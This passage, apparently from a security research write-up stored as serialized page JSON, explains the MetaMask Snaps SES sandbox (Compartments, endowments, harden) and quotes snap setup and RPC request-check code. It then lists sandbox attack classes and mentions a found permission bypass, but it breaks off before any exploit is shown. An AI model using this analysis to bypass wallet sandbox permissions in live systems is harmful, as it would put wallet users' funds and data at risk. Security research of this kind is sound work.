false\n",{"type":25,"tag":216,"props":41460,"children":41461},{"class":6922,"line":6778},[41462,41466,41470,41474,41478,41483,41487,41492,41496],{"type":25,"tag":216,"props":41463,"children":41464},{"style":6947},[41465],{"type":31,"value":2254},{"type":25,"tag":216,"props":41467,"children":41468},{"style":6964},[41469],{"type":31,"value":179},{"type":25,"tag":216,"props":41471,"children":41472},{"style":6947},[41473],{"type":31,"value":41380},{"type":25,"tag":216,"props":41475,"children":41476},{"style":6964},[41477],{"type":31,"value":179},{"type":25,"tag":216,"props":41479,"children":41480},{"style":6947},[41481],{"type":31,"value":41482},"JSON",{"type":25,"tag":216,"props":41484,"children":41485},{"style":6953},[41486],{"type":31,"value":35384},{"type":25,"tag":216,"props":41488,"children":41489},{"style":6947},[41490],{"type":31,"value":41491}," JSON",{"type":25,"tag":216,"props":41493,"children":41494},{"style":6964},[41495],{"type":31,"value":21184},{"type":25,"tag":216,"props":41497,"children":41498},{"style":6927},[41499],{"type":31,"value":41500},"// true\n",{"type":25,"tag":38,"props":41502,"children":41503},{},[41504,41506,41512,41514,41520,41522,41527],{"type":31,"value":41505},"Compartment also changes the behaviour of evaluators functions such as ",{"type":25,"tag":82,"props":41507,"children":41509},{"className":41508},[],[41510],{"type":31,"value":41511},"eval",{"type":31,"value":41513}," and the ",{"type":25,"tag":82,"props":41515,"children":41517},{"className":41516},[],[41518],{"type":31,"value":41519},"Function",{"type":31,"value":41521}," constructor, so that the evaluated code is also executed within the sandboxed ",{"type":25,"tag":82,"props":41523,"children":41525},{"className":41524},[],[41526],{"type":31,"value":41380},{"type":31,"value":179},{"type":25,"tag":41309,"props":41529,"children":41531},{"id":41530},"endowments",[41532],{"type":31,"value":41533},"Endowments",{"type":25,"tag":38,"props":41535,"children":41536},{},[41537,41539,41543,41545,41550],{"type":31,"value":41538},"While creating a Compartment, it is possible to specify ",{"type":25,"tag":64,"props":41540,"children":41541},{},[41542],{"type":31,"value":41530},{"type":31,"value":41544},". These endowments constitute objects that become accessible within the Compartment's ",{"type":25,"tag":82,"props":41546,"children":41548},{"className":41547},[],[41549],{"type":31,"value":41380},{"type":31,"value":41551},". However, endowments need to be carefully chosen and sanitized since they will be exposed to the untrusted environment.",{"type":25,"tag":38,"props":41553,"children":41554},{},[41555,41557,41563],{"type":31,"value":41556},"In addition, SES provides the ",{"type":25,"tag":82,"props":41558,"children":41560},{"className":41559},[],[41561],{"type":31,"value":41562},"harden()",{"type":31,"value":41564}," function, which is mainly used to prevent the endowments to be modified by a malicious code executed in a Compartment.",{"type":25,"tag":630,"props":41566,"children":41568},{"id":41567},"setting-up-snaps-execution-env",[41569],{"type":31,"value":41570},"Setting up Snaps Execution Env",{"type":25,"tag":38,"props":41572,"children":41573},{},[41574],{"type":31,"value":41575},"When starting a snap, the setup follows these steps:",{"type":25,"tag":6711,"props":41577,"children":41578},{},[41579],{"type":25,"tag":2043,"props":41580,"children":41581},{},[41582],{"type":25,"tag":9273,"props":41583,"children":41584},{},[41585,41587],{"type":31,"value":41586},"Create endowments based on snap ",{"type":25,"tag":162,"props":41588,"children":41591},{"href":41589,"rel":41590},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L327",[166],[41592],{"type":31,"value":41593},"permissions",{"type":25,"tag":206,"props":41595,"children":41597},{"className":39576,"code":41596,"language":39578,"meta":7,"style":7},"const { endowments, teardown: endowmentTeardown } = createEndowments(\n    snap,\n    ethereum,\n    snapId,\n    _endowments,\n);\n",[41598],{"type":25,"tag":82,"props":41599,"children":41600},{"__ignoreMap":7},[41601,41651,41663,41674,41686,41698],{"type":25,"tag":216,"props":41602,"children":41603},{"class":6922,"line":6923},[41604,41608,41612,41616,41620,41625,41629,41634,41638,41642,41647],{"type":25,"tag":216,"props":41605,"children":41606},{"style":6936},[41607],{"type":31,"value":13611},{"type":25,"tag":216,"props":41609,"children":41610},{"style":6964},[41611],{"type":31,"value":13542},{"type":25,"tag":216,"props":41613,"children":41614},{"style":6947},[41615],{"type":31,"value":41530},{"type":25,"tag":216,"props":41617,"children":41618},{"style":6964},[41619],{"type":31,"value":7026},{"type":25,"tag":216,"props":41621,"children":41622},{"style":6947},[41623],{"type":31,"value":41624},"teardown",{"type":25,"tag":216,"props":41626,"children":41627},{"style":6964},[41628],{"type":31,"value":19288},{"type":25,"tag":216,"props":41630,"children":41631},{"style":6947},[41632],{"type":31,"value":41633},"endowmentTeardown",{"type":25,"tag":216,"props":41635,"children":41636},{"style":6964},[41637],{"type":31,"value":40165},{"type":25,"tag":216,"props":41639,"children":41640},{"style":6953},[41641],{"type":31,"value":266},{"type":25,"tag":216,"props":41643,"children":41644},{"style":7047},[41645],{"type":31,"value":41646}," createEndowments",{"type":25,"tag":216,"props":41648,"children":41649},{"style":6964},[41650],{"type":31,"value":7420},{"type":25,"tag":216,"props":41652,"children":41653},{"class":6922,"line":6769},[41654,41659],{"type":25,"tag":216,"props":41655,"children":41656},{"style":6947},[41657],{"type":31,"value":41658},"    snap",{"type":25,"tag":216,"props":41660,"children":41661},{"style":6964},[41662],{"type":31,"value":7465},{"type":25,"tag":216,"props":41664,"children":41665},{"class":6922,"line":6778},[41666,41670],{"type":25,"tag":216,"props":41667,"children":41668},{"style":6947},[41669],{"type":31,"value":35446},{"type":25,"tag":216,"props":41671,"children":41672},{"style":6964},[41673],{"type":31,"value":7465},{"type":25,"tag":216,"props":41675,"children":41676},{"class":6922,"line":7005},[41677,41682],{"type":25,"tag":216,"props":41678,"children":41679},{"style":6947},[41680],{"type":31,"value":41681},"    snapId",{"type":25,"tag":216,"props":41683,"children":41684},{"style":6964},[41685],{"type":31,"value":7465},{"type":25,"tag":216,"props":41687,"children":41688},{"class":6922,"line":7110},[41689,41694],{"type":25,"tag":216,"props":41690,"children":41691},{"style":6947},[41692],{"type":31,"value":41693},"    _endowments",{"type":25,"tag":216,"props":41695,"children":41696},{"style":6964},[41697],{"type":31,"value":7465},{"type":25,"tag":216,"props":41699,"children":41700},{"class":6922,"line":7216},[41701],{"type":25,"tag":216,"props":41702,"children":41703},{"style":6964},[41704],{"type":31,"value":7797},{"type":25,"tag":38,"props":41706,"children":41707},{},[41708],{"type":31,"value":41709},"In the snap development, the required permissions need to be specified in a snap manifest file. Some of these permissions expose extra functions as endowments in the Compartment.",{"type":25,"tag":38,"props":41711,"children":41712},{},[41713,41715,41721,41723,41729],{"type":31,"value":41714},"One clear example is the ",{"type":25,"tag":82,"props":41716,"children":41718},{"className":41717},[],[41719],{"type":31,"value":41720},"endowment:network-access",{"type":31,"value":41722}," permission, that adds the ",{"type":25,"tag":82,"props":41724,"children":41726},{"className":41725},[],[41727],{"type":31,"value":41728},"fetch()",{"type":31,"value":41730}," function to the endowments.",{"type":25,"tag":38,"props":41732,"children":41733},{},[41734,41736,41742],{"type":31,"value":41735},"All endowments are protected with the ",{"type":25,"tag":82,"props":41737,"children":41739},{"className":41738},[],[41740],{"type":31,"value":41741},"harden",{"type":31,"value":41743}," function to prevent possible exploits derived from the endowment modification, with two exceptions.",{"type":25,"tag":6711,"props":41745,"children":41746},{"start":6769},[41747],{"type":25,"tag":2043,"props":41748,"children":41749},{},[41750],{"type":25,"tag":9273,"props":41751,"children":41752},{},[41753,41755],{"type":31,"value":41754},"Create the snap ",{"type":25,"tag":162,"props":41756,"children":41759},{"href":41757,"rel":41758},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L345",[166],[41760],{"type":31,"value":41366},{"type":25,"tag":206,"props":41762,"children":41764},{"className":39576,"code":41763,"language":39578,"meta":7,"style":7},"const compartment = new Compartment({\n    ...endowments,\n    module: snapModule,\n    exports: snapModule.exports,\n});\n",[41765],{"type":25,"tag":82,"props":41766,"children":41767},{"__ignoreMap":7},[41768,41796,41812,41829,41854],{"type":25,"tag":216,"props":41769,"children":41770},{"class":6922,"line":6923},[41771,41775,41780,41784,41788,41792],{"type":25,"tag":216,"props":41772,"children":41773},{"style":6936},[41774],{"type":31,"value":13611},{"type":25,"tag":216,"props":41776,"children":41777},{"style":6947},[41778],{"type":31,"value":41779}," compartment",{"type":25,"tag":216,"props":41781,"children":41782},{"style":6953},[41783],{"type":31,"value":6956},{"type":25,"tag":216,"props":41785,"children":41786},{"style":6936},[41787],{"type":31,"value":35895},{"type":25,"tag":216,"props":41789,"children":41790},{"style":7047},[41791],{"type":31,"value":41421},{"type":25,"tag":216,"props":41793,"children":41794},{"style":6964},[41795],{"type":31,"value":19098},{"type":25,"tag":216,"props":41797,"children":41798},{"class":6922,"line":6769},[41799,41804,41808],{"type":25,"tag":216,"props":41800,"children":41801},{"style":6953},[41802],{"type":31,"value":41803},"    ...",{"type":25,"tag":216,"props":41805,"children":41806},{"style":6947},[41807],{"type":31,"value":41530},{"type":25,"tag":216,"props":41809,"children":41810},{"style":6964},[41811],{"type":31,"value":7465},{"type":25,"tag":216,"props":41813,"children":41814},{"class":6922,"line":6778},[41815,41820,41825],{"type":25,"tag":216,"props":41816,"children":41817},{"style":6947},[41818],{"type":31,"value":41819},"    module:",{"type":25,"tag":216,"props":41821,"children":41822},{"style":6947},[41823],{"type":31,"value":41824}," snapModule",{"type":25,"tag":216,"props":41826,"children":41827},{"style":6964},[41828],{"type":31,"value":7465},{"type":25,"tag":216,"props":41830,"children":41831},{"class":6922,"line":7005},[41832,41837,41841,41845,41850],{"type":25,"tag":216,"props":41833,"children":41834},{"style":6947},[41835],{"type":31,"value":41836},"    exports:",{"type":25,"tag":216,"props":41838,"children":41839},{"style":6947},[41840],{"type":31,"value":41824},{"type":25,"tag":216,"props":41842,"children":41843},{"style":6964},[41844],{"type":31,"value":179},{"type":25,"tag":216,"props":41846,"children":41847},{"style":6947},[41848],{"type":31,"value":41849},"exports",{"type":25,"tag":216,"props":41851,"children":41852},{"style":6964},[41853],{"type":31,"value":7465},{"type":25,"tag":216,"props":41855,"children":41856},{"class":6922,"line":7110},[41857],{"type":25,"tag":216,"props":41858,"children":41859},{"style":6964},[41860],{"type":31,"value":39301},{"type":25,"tag":38,"props":41862,"children":41863},{},[41864,41866,41872,41873,41878,41880,41885],{"type":31,"value":41865},"Note: ",{"type":25,"tag":82,"props":41867,"children":41869},{"className":41868},[],[41870],{"type":31,"value":41871},"module",{"type":31,"value":1307},{"type":25,"tag":82,"props":41874,"children":41876},{"className":41875},[],[41877],{"type":31,"value":41849},{"type":31,"value":41879}," are passed as endowments, but without being ",{"type":25,"tag":64,"props":41881,"children":41882},{},[41883],{"type":31,"value":41884},"hardened",{"type":31,"value":41886},". This is intentional, as the snap needs to export functions to be correctly executed.",{"type":25,"tag":6711,"props":41888,"children":41889},{"start":6778},[41890],{"type":25,"tag":2043,"props":41891,"children":41892},{},[41893],{"type":25,"tag":9273,"props":41894,"children":41895},{},[41896,41898],{"type":31,"value":41897},"Evaluate the snap code inside the ",{"type":25,"tag":162,"props":41899,"children":41902},{"href":41900,"rel":41901},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L359",[166],[41903],{"type":31,"value":41366},{"type":25,"tag":206,"props":41905,"children":41907},{"className":39576,"code":41906,"language":39578,"meta":7,"style":7},"await this.executeInSnapContext(snapId, () => {\n    compartment.evaluate(sourceCode);\n    this.registerSnapExports(snapId, snapModule);\n});\n",[41908],{"type":25,"tag":82,"props":41909,"children":41910},{"__ignoreMap":7},[41911,41952,41982,42019],{"type":25,"tag":216,"props":41912,"children":41913},{"class":6922,"line":6923},[41914,41918,41922,41926,41931,41935,41939,41944,41948],{"type":25,"tag":216,"props":41915,"children":41916},{"style":6973},[41917],{"type":31,"value":36878},{"type":25,"tag":216,"props":41919,"children":41920},{"style":6936},[41921],{"type":31,"value":39679},{"type":25,"tag":216,"props":41923,"children":41924},{"style":6964},[41925],{"type":31,"value":179},{"type":25,"tag":216,"props":41927,"children":41928},{"style":7047},[41929],{"type":31,"value":41930},"executeInSnapContext",{"type":25,"tag":216,"props":41932,"children":41933},{"style":6964},[41934],{"type":31,"value":1850},{"type":25,"tag":216,"props":41936,"children":41937},{"style":6947},[41938],{"type":31,"value":39983},{"type":25,"tag":216,"props":41940,"children":41941},{"style":6964},[41942],{"type":31,"value":41943},", () ",{"type":25,"tag":216,"props":41945,"children":41946},{"style":6936},[41947],{"type":31,"value":18779},{"type":25,"tag":216,"props":41949,"children":41950},{"style":6964},[41951],{"type":31,"value":7241},{"type":25,"tag":216,"props":41953,"children":41954},{"class":6922,"line":6769},[41955,41960,41964,41969,41973,41978],{"type":25,"tag":216,"props":41956,"children":41957},{"style":6947},[41958],{"type":31,"value":41959},"    compartment",{"type":25,"tag":216,"props":41961,"children":41962},{"style":6964},[41963],{"type":31,"value":179},{"type":25,"tag":216,"props":41965,"children":41966},{"style":7047},[41967],{"type":31,"value":41968},"evaluate",{"type":25,"tag":216,"props":41970,"children":41971},{"style":6964},[41972],{"type":31,"value":1850},{"type":25,"tag":216,"props":41974,"children":41975},{"style":6947},[41976],{"type":31,"value":41977},"sourceCode",{"type":25,"tag":216,"props":41979,"children":41980},{"style":6964},[41981],{"type":31,"value":7797},{"type":25,"tag":216,"props":41983,"children":41984},{"class":6922,"line":6778},[41985,41989,41993,41998,42002,42006,42010,42015],{"type":25,"tag":216,"props":41986,"children":41987},{"style":6936},[41988],{"type":31,"value":40027},{"type":25,"tag":216,"props":41990,"children":41991},{"style":6964},[41992],{"type":31,"value":179},{"type":25,"tag":216,"props":41994,"children":41995},{"style":7047},[41996],{"type":31,"value":41997},"registerSnapExports",{"type":25,"tag":216,"props":41999,"children":42000},{"style":6964},[42001],{"type":31,"value":1850},{"type":25,"tag":216,"props":42003,"children":42004},{"style":6947},[42005],{"type":31,"value":39983},{"type":25,"tag":216,"props":42007,"children":42008},{"style":6964},[42009],{"type":31,"value":7026},{"type":25,"tag":216,"props":42011,"children":42012},{"style":6947},[42013],{"type":31,"value":42014},"snapModule",{"type":25,"tag":216,"props":42016,"children":42017},{"style":6964},[42018],{"type":31,"value":7797},{"type":25,"tag":216,"props":42020,"children":42021},{"class":6922,"line":7005},[42022],{"type":25,"tag":216,"props":42023,"children":42024},{"style":6964},[42025],{"type":31,"value":39301},{"type":25,"tag":38,"props":42027,"children":42028},{},[42029,42031,42037,42038,42044,42045,42051],{"type":31,"value":42030},"According to the documentation, the snap must contain one of the following function exports: ",{"type":25,"tag":82,"props":42032,"children":42034},{"className":42033},[],[42035],{"type":31,"value":42036},"onRpcRequest",{"type":31,"value":7026},{"type":25,"tag":82,"props":42039,"children":42041},{"className":42040},[],[42042],{"type":31,"value":42043},"onTransaction",{"type":31,"value":17090},{"type":25,"tag":82,"props":42046,"children":42048},{"className":42047},[],[42049],{"type":31,"value":42050},"onCronjob",{"type":31,"value":179},{"type":25,"tag":38,"props":42053,"children":42054},{},[42055,42057,42062],{"type":31,"value":42056},"Once the Compartment creates these functions, no matter where they are executed, they will always be evaluated within the sandboxed ",{"type":25,"tag":82,"props":42058,"children":42060},{"className":42059},[],[42061],{"type":31,"value":41380},{"type":31,"value":42063}," environment of that Compartment.",{"type":25,"tag":38,"props":42065,"children":42066},{},[42067],{"type":31,"value":42068},"After the evaluation, the function exports are registered and executed later when the respective event is emmited.",{"type":25,"tag":26,"props":42070,"children":42072},{"id":42071},"vulnerability-research",[42073],{"type":31,"value":42074},"Vulnerability research",{"type":25,"tag":606,"props":42076,"children":42078},{"id":42077},"possible-attacks",[42079],{"type":31,"value":42080},"Possible attacks",{"type":25,"tag":38,"props":42082,"children":42083},{},[42084],{"type":31,"value":42085},"While searching for vulnerabilities in snap environments, we enumerated some features that can be broken, and lead to security issues, such as:",{"type":25,"tag":2039,"props":42087,"children":42088},{},[42089,42094,42099,42104],{"type":25,"tag":2043,"props":42090,"children":42091},{},[42092],{"type":31,"value":42093},"Broken SES Container isolation",{"type":25,"tag":2043,"props":42095,"children":42096},{},[42097],{"type":31,"value":42098},"Insecure endowments in Containers",{"type":25,"tag":2043,"props":42100,"children":42101},{},[42102],{"type":31,"value":42103},"Incorrect RPC permission checks",{"type":25,"tag":2043,"props":42105,"children":42106},{},[42107],{"type":31,"value":42108},"Insecure snap installation/update",{"type":25,"tag":38,"props":42110,"children":42111},{},[42112],{"type":31,"value":42113},"We went through all of these vulnerabilities assumptions, and found a minor permission bypass bug using insecure endowments.",{"type":25,"tag":38,"props":42115,"children":42116},{},[42117],{"type":31,"value":42118},"To understand the exploit, we need to dig into the snap's RPC interfaces exposed via endowments.",{"type":25,"tag":606,"props":42120,"children":42122},{"id":42121},"rpc-interfaces-endowments",[42123],{"type":31,"value":42124},"RPC interfaces endowments",{"type":25,"tag":630,"props":42126,"children":42128},{"id":42127},"providers-limitations",[42129],{"type":31,"value":42130},"Providers limitations",{"type":25,"tag":38,"props":42132,"children":42133},{},[42134,42136,42142,42143,42148,42150,42157],{"type":31,"value":42135},"A snap has two interfaces that can be used to communicate with metamask RPC interface: ",{"type":25,"tag":82,"props":42137,"children":42139},{"className":42138},[],[42140],{"type":31,"value":42141},"snap",{"type":31,"value":1307},{"type":25,"tag":82,"props":42144,"children":42146},{"className":42145},[],[42147],{"type":31,"value":35379},{"type":31,"value":42149}," (EIP-1193). These differ in that each one can only send a subset of the available RPC ",{"type":25,"tag":162,"props":42151,"children":42154},{"href":42152,"rel":42153},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/utils.ts#L130",[166],[42155],{"type":31,"value":42156},"methods",{"type":31,"value":1472},{"type":25,"tag":206,"props":42159,"children":42161},{"className":39576,"code":42160,"language":39578,"meta":7,"style":7},"export function assertSnapOutboundRequest(args: RequestArguments) {\n  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n  assert(\n    String.prototype.startsWith.call(args.method, 'wallet_') ||\n      String.prototype.startsWith.call(args.method, 'snap_'),\n    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.',\n  );\n  assert(\n    !BLOCKED_RPC_METHODS.includes(args.method),\n    ethErrors.rpc.methodNotFound({\n      data: {\n        method: args.method,\n      },\n    }),\n  );\n  assertStruct(args, JsonStruct, 'Provided value is not JSON-RPC compatible');\n}\n",[42162],{"type":25,"tag":82,"props":42163,"children":42164},{"__ignoreMap":7},[42165,42205,42213,42225,42295,42356,42368,42376,42387,42427,42457,42469,42494,42501,42509,42516,42554],{"type":25,"tag":216,"props":42166,"children":42167},{"class":6922,"line":6923},[42168,42173,42178,42183,42187,42192,42196,42201],{"type":25,"tag":216,"props":42169,"children":42170},{"style":6973},[42171],{"type":31,"value":42172},"export",{"type":25,"tag":216,"props":42174,"children":42175},{"style":6936},[42176],{"type":31,"value":42177}," function",{"type":25,"tag":216,"props":42179,"children":42180},{"style":7047},[42181],{"type":31,"value":42182}," assertSnapOutboundRequest",{"type":25,"tag":216,"props":42184,"children":42185},{"style":6964},[42186],{"type":31,"value":1850},{"type":25,"tag":216,"props":42188,"children":42189},{"style":6947},[42190],{"type":31,"value":42191},"args",{"type":25,"tag":216,"props":42193,"children":42194},{"style":6953},[42195],{"type":31,"value":1472},{"type":25,"tag":216,"props":42197,"children":42198},{"style":7375},[42199],{"type":31,"value":42200}," RequestArguments",{"type":25,"tag":216,"props":42202,"children":42203},{"style":6964},[42204],{"type":31,"value":18761},{"type":25,"tag":216,"props":42206,"children":42207},{"class":6922,"line":6769},[42208],{"type":25,"tag":216,"props":42209,"children":42210},{"style":6927},[42211],{"type":31,"value":42212},"  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n",{"type":25,"tag":216,"props":42214,"children":42215},{"class":6922,"line":6778},[42216,42221],{"type":25,"tag":216,"props":42217,"children":42218},{"style":7047},[42219],{"type":31,"value":42220},"  assert",{"type":25,"tag":216,"props":42222,"children":42223},{"style":6964},[42224],{"type":31,"value":7420},{"type":25,"tag":216,"props":42226,"children":42227},{"class":6922,"line":7005},[42228,42233,42237,42242,42246,42251,42255,42260,42264,42268,42272,42277,42281,42286,42290],{"type":25,"tag":216,"props":42229,"children":42230},{"style":7375},[42231],{"type":31,"value":42232},"    String",{"type":25,"tag":216,"props":42234,"children":42235},{"style":6964},[42236],{"type":31,"value":179},{"type":25,"tag":216,"props":42238,"children":42239},{"style":6947},[42240],{"type":31,"value":42241},"prototype",{"type":25,"tag":216,"props":42243,"children":42244},{"style":6964},[42245],{"type":31,"value":179},{"type":25,"tag":216,"props":42247,"children":42248},{"style":6947},[42249],{"type":31,"value":42250},"startsWith",{"type":25,"tag":216,"props":42252,"children":42253},{"style":6964},[42254],{"type":31,"value":179},{"type":25,"tag":216,"props":42256,"children":42257},{"style":7047},[42258],{"type":31,"value":42259},"call",{"type":25,"tag":216,"props":42261,"children":42262},{"style":6964},[42263],{"type":31,"value":1850},{"type":25,"tag":216,"props":42265,"children":42266},{"style":6947},[42267],{"type":31,"value":42191},{"type":25,"tag":216,"props":42269,"children":42270},{"style":6964},[42271],{"type":31,"value":179},{"type":25,"tag":216,"props":42273,"children":42274},{"style":6947},[42275],{"type":31,"value":42276},"method",{"type":25,"tag":216,"props":42278,"children":42279},{"style":6964},[42280],{"type":31,"value":7026},{"type":25,"tag":216,"props":42282,"children":42283},{"style":8205},[42284],{"type":31,"value":42285},"'wallet_'",{"type":25,"tag":216,"props":42287,"children":42288},{"style":6964},[42289],{"type":31,"value":7036},{"type":25,"tag":216,"props":42291,"children":42292},{"style":6953},[42293],{"type":31,"value":42294},"||\n",{"type":25,"tag":216,"props":42296,"children":42297},{"class":6922,"line":7110},[42298,42303,42307,42311,42315,42319,42323,42327,42331,42335,42339,42343,42347,42352],{"type":25,"tag":216,"props":42299,"children":42300},{"style":7375},[42301],{"type":31,"value":42302},"      String",{"type":25,"tag":216,"props":42304,"children":42305},{"style":6964},[42306],{"type":31,"value":179},{"type":25,"tag":216,"props":42308,"children":42309},{"style":6947},[42310],{"type":31,"value":42241},{"type":25,"tag":216,"props":42312,"children":42313},{"style":6964},[42314],{"type":31,"value":179},{"type":25,"tag":216,"props":42316,"children":42317},{"style":6947},[42318],{"type":31,"value":42250},{"type":25,"tag":216,"props":42320,"children":42321},{"style":6964},[42322],{"type":31,"value":179},{"type":25,"tag":216,"props":42324,"children":42325},{"style":7047},[42326],{"type":31,"value":42259},{"type":25,"tag":216,"props":42328,"children":42329},{"style":6964},[42330],{"type":31,"value":1850},{"type":25,"tag":216,"props":42332,"children":42333},{"style":6947},[42334],{"type":31,"value":42191},{"type":25,"tag":216,"props":42336,"children":42337},{"style":6964},[42338],{"type":31,"value":179},{"type":25,"tag":216,"props":42340,"children":42341},{"style":6947},[42342],{"type":31,"value":42276},{"type":25,"tag":216,"props":42344,"children":42345},{"style":6964},[42346],{"type":31,"value":7026},{"type":25,"tag":216,"props":42348,"children":42349},{"style":8205},[42350],{"type":31,"value":42351},"'snap_'",{"type":25,"tag":216,"props":42353,"children":42354},{"style":6964},[42355],{"type":31,"value":10688},{"type":25,"tag":216,"props":42357,"children":42358},{"class":6922,"line":7216},[42359,42364],{"type":25,"tag":216,"props":42360,"children":42361},{"style":8205},[42362],{"type":31,"value":42363},"    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.'",{"type":25,"tag":216,"props":42365,"children":42366},{"style":6964},[42367],{"type":31,"value":7465},{"type":25,"tag":216,"props":42369,"children":42370},{"class":6922,"line":7244},[42371],{"type":25,"tag":216,"props":42372,"children":42373},{"style":6964},[42374],{"type":31,"value":42375},"  );\n",{"type":25,"tag":216,"props":42377,"children":42378},{"class":6922,"line":7257},[42379,42383],{"type":25,"tag":216,"props":42380,"children":42381},{"style":7047},[42382],{"type":31,"value":42220},{"type":25,"tag":216,"props":42384,"children":42385},{"style":6964},[42386],{"type":31,"value":7420},{"type":25,"tag":216,"props":42388,"children":42389},{"class":6922,"line":7275},[42390,42394,42399,42403,42407,42411,42415,42419,42423],{"type":25,"tag":216,"props":42391,"children":42392},{"style":6953},[42393],{"type":31,"value":24930},{"type":25,"tag":216,"props":42395,"children":42396},{"style":6947},[42397],{"type":31,"value":42398},"BLOCKED_RPC_METHODS",{"type":25,"tag":216,"props":42400,"children":42401},{"style":6964},[42402],{"type":31,"value":179},{"type":25,"tag":216,"props":42404,"children":42405},{"style":7047},[42406],{"type":31,"value":39144},{"type":25,"tag":216,"props":42408,"children":42409},{"style":6964},[42410],{"type":31,"value":1850},{"type":25,"tag":216,"props":42412,"children":42413},{"style":6947},[42414],{"type":31,"value":42191},{"type":25,"tag":216,"props":42416,"children":42417},{"style":6964},[42418],{"type":31,"value":179},{"type":25,"tag":216,"props":42420,"children":42421},{"style":6947},[42422],{"type":31,"value":42276},{"type":25,"tag":216,"props":42424,"children":42425},{"style":6964},[42426],{"type":31,"value":10688},{"type":25,"tag":216,"props":42428,"children":42429},{"class":6922,"line":7296},[42430,42435,42439,42444,42448,42453],{"type":25,"tag":216,"props":42431,"children":42432},{"style":6947},[42433],{"type":31,"value":42434},"    ethErrors",{"type":25,"tag":216,"props":42436,"children":42437},{"style":6964},[42438],{"type":31,"value":179},{"type":25,"tag":216,"props":42440,"children":42441},{"style":6947},[42442],{"type":31,"value":42443},"rpc",{"type":25,"tag":216,"props":42445,"children":42446},{"style":6964},[42447],{"type":31,"value":179},{"type":25,"tag":216,"props":42449,"children":42450},{"style":7047},[42451],{"type":31,"value":42452},"methodNotFound",{"type":25,"tag":216,"props":42454,"children":42455},{"style":6964},[42456],{"type":31,"value":19098},{"type":25,"tag":216,"props":42458,"children":42459},{"class":6922,"line":7305},[42460,42465],{"type":25,"tag":216,"props":42461,"children":42462},{"style":6947},[42463],{"type":31,"value":42464},"      data:",{"type":25,"tag":216,"props":42466,"children":42467},{"style":6964},[42468],{"type":31,"value":7241},{"type":25,"tag":216,"props":42470,"children":42471},{"class":6922,"line":7557},[42472,42477,42482,42486,42490],{"type":25,"tag":216,"props":42473,"children":42474},{"style":6947},[42475],{"type":31,"value":42476},"        method:",{"type":25,"tag":216,"props":42478,"children":42479},{"style":6947},[42480],{"type":31,"value":42481}," args",{"type":25,"tag":216,"props":42483,"children":42484},{"style":6964},[42485],{"type":31,"value":179},{"type":25,"tag":216,"props":42487,"children":42488},{"style":6947},[42489],{"type":31,"value":42276},{"type":25,"tag":216,"props":42491,"children":42492},{"style":6964},[42493],{"type":31,"value":7465},{"type":25,"tag":216,"props":42495,"children":42496},{"class":6922,"line":7574},[42497],{"type":25,"tag":216,"props":42498,"children":42499},{"style":6964},[42500],{"type":31,"value":41162},{"type":25,"tag":216,"props":42502,"children":42503},{"class":6922,"line":7591},[42504],{"type":25,"tag":216,"props":42505,"children":42506},{"style":6964},[42507],{"type":31,"value":42508},"    }),\n",{"type":25,"tag":216,"props":42510,"children":42511},{"class":6922,"line":7604},[42512],{"type":25,"tag":216,"props":42513,"children":42514},{"style":6964},[42515],{"type":31,"value":42375},{"type":25,"tag":216,"props":42517,"children":42518},{"class":6922,"line":7613},[42519,42524,42528,42532,42536,42541,42545,42550],{"type":25,"tag":216,"props":42520,"children":42521},{"style":7047},[42522],{"type":31,"value":42523},"  assertStruct",{"type":25,"tag":216,"props":42525,"children":42526},{"style":6964},[42527],{"type":31,"value":1850},{"type":25,"tag":216,"props":42529,"children":42530},{"style":6947},[42531],{"type":31,"value":42191},{"type":25,"tag":216,"props":42533,"children":42534},{"style":6964},[42535],{"type":31,"value":7026},{"type":25,"tag":216,"props":42537,"children":42538},{"style":6947},[42539],{"type":31,"value":42540},"JsonStruct",{"type":25,"tag":216,"props":42542,"children":42543},{"style":6964},[42544],{"type":31,"value":7026},{"type":25,"tag":216,"props":42546,"children":42547},{"style":8205},[42548],{"type":31,"value":42549},"'Provided value is not JSON-RPC compatible'",{"type":25,"tag":216,"props":42551,"children":42552},{"style":6964},[42553],{"type":31,"value":7797},{"type":25,"tag":216,"props":42555,"children":42556},{"class":6922,"line":7636},[42557],{"type":25,"tag":216,"props":42558,"children":42559},{"style":6964},[42560],{"type":31,"value":7874},{"type":25,"tag":38,"props":42562,"children":42563},{},[42564,42566,42571,42573,42579,42580,42586],{"type":31,"value":42565},"This function is called by the ",{"type":25,"tag":82,"props":42567,"children":42569},{"className":42568},[],[42570],{"type":31,"value":42141},{"type":31,"value":42572}," RPC provider, so it can only send methods starting with ",{"type":25,"tag":82,"props":42574,"children":42576},{"className":42575},[],[42577],{"type":31,"value":42578},"wallet_",{"type":31,"value":17090},{"type":25,"tag":82,"props":42581,"children":42583},{"className":42582},[],[42584],{"type":31,"value":42585},"snap_",{"type":31,"value":42587},". In addition, there are some blocked RPC methods that immediately throw an error when encountered.",{"type":25,"tag":38,"props":42589,"children":42590},{},[42591,42593,42598,42600,42605,42607,42613],{"type":31,"value":42592},"On the other hand, the ",{"type":25,"tag":82,"props":42594,"children":42596},{"className":42595},[],[42597],{"type":31,"value":35379},{"type":31,"value":42599}," provider only blocks methods starting with ",{"type":25,"tag":82,"props":42601,"children":42603},{"className":42602},[],[42604],{"type":31,"value":42585},{"type":31,"value":42606}," and the blocked methods. However, it requires the ",{"type":25,"tag":82,"props":42608,"children":42610},{"className":42609},[],[42611],{"type":31,"value":42612},"endowment:ethereum-provider",{"type":31,"value":42614}," permission in the snap manifest.",{"type":25,"tag":630,"props":42616,"children":42618},{"id":42617},"execution-flow",[42619],{"type":31,"value":42620},"Execution flow",{"type":25,"tag":38,"props":42622,"children":42623},{},[42624,42626,42631,42632,42637,42639,42644,42645,42651],{"type":31,"value":42625},"Both providers 